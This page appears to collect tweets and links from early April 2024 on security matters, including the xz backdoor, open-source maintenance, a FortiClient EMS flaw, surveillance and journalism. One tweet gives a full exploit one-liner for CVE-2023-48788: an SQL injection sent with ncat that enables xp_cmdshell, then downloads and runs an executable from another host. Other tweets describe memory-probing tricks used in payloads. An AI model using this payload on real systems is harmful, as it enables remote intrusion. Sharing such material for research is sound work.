April 4, 2024
April 4, 2024
xz bd engineer 1: bro, we need a way to probe the address space to make sure we never SEGV sshd
— blasty (@bl4sty) April 2, 2024
xz bd engineer 2: we'll just do a pselect syscall with empty fd sets, a timeout of 1 nanosecond and the addr we want to probe is passed as the sigmask pointer, EFAULT means unmapped pic.twitter.com/11Grpkr9kJ
I usually just use access() for this, in payloads where I need to scan for readable memory, passing the pointer I want to check as the pathname -> returning -EFAULT if not mapped/readable
— Joel Eriksson (@OwariDa) April 3, 2024
But yeah, pselect() was probably used in this case to "blend in" within the context of sshd
A corporation’s choice to use someone’s hobby project in their production environment is not the responsibility of the hobbyist. https://t.co/wWAxFYoH2X
— KymPossible (@Kym_Possible) April 3, 2024
Unpopular opinion: If your hobby is now responsible for running the modern world, it’s no longer just a hobby.
— Heather Adkins - Ꜻ - Spes consilium non est (@argvee) April 2, 2024
RCE:
— wvu (@wvuuuuuuuuuuuuu) April 3, 2024
echo -ne "MSG_HEADER: FCTUID=';EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;EXEC xp_cmdshell 'CURL -O 192.168.56.1/X.EXE&X.EXE&DEL X.EXE';--\nX-FCCK-REGISTER:\r\n" | ncat --ssl 192.168.56.101 8013 https://t.co/uQtcQcvK17
Our deep-dive for the recent #Fortinet #FortiClient EMS SQL injection vulnerability, CVE-2023-48788, that leads to RCE as SYSTEM. https://t.co/qhg45iaFu3
— Horizon3 Attack Team (@Horizon3Attack) March 21, 2024
📢 My @NDSSSymposium keynote is up!
— Meredith Whittaker (@mer__edith) April 3, 2024
On how we lost the crypto wars, why surveillance advertising must be understood as the foundation of "AI", & why the tactics of the past won't serve us in defending privacy today.
Text: https://t.co/QQOco14Koz
Video: https://t.co/NSMKRwEAPJ
Tips for Linking Shell Companies to their Secret Owners – Global Investigative Journalism Network
At a recent panel at the 2024 NICAR conference, Karrie Kehoe, deputy head of data and research at ICIJ, offered a series of tips for investigating the true owners of shell companies.
A very difficult, unfun, but important read:https://t.co/0vLcxjWQ1P
— Halvar Flake (@halvarflake) April 3, 2024
GitHub - qilingframework/qiling: A True Instrumentable Binary Emulation Framework
A True Instrumentable Binary Emulation Framework. Contribute to qilingframework/qiling development by creating an account on GitHub.
My comments for @BBC. It was long discussed/suspected that US/UK/EU-based folks participate in cyberops in support of Ukraine against Russia. Now Ukraine recognized such efforts, giving awards to the team. Congratulations! https://t.co/UpmL2PF12r pic.twitter.com/a0tuHm7d7v
— Lukasz Olejnik, ☕️🥐 (@lukOlejnik) April 4, 2024
In addressing the Havana Syndrome controversy, I'd stick to the old golden triangle for crime investigations: who had the Motive, Means and Opportunity - and if a suspect is found, does s/he have an Alibi (short thread)
— Christo Grozev (@christogrozev) April 3, 2024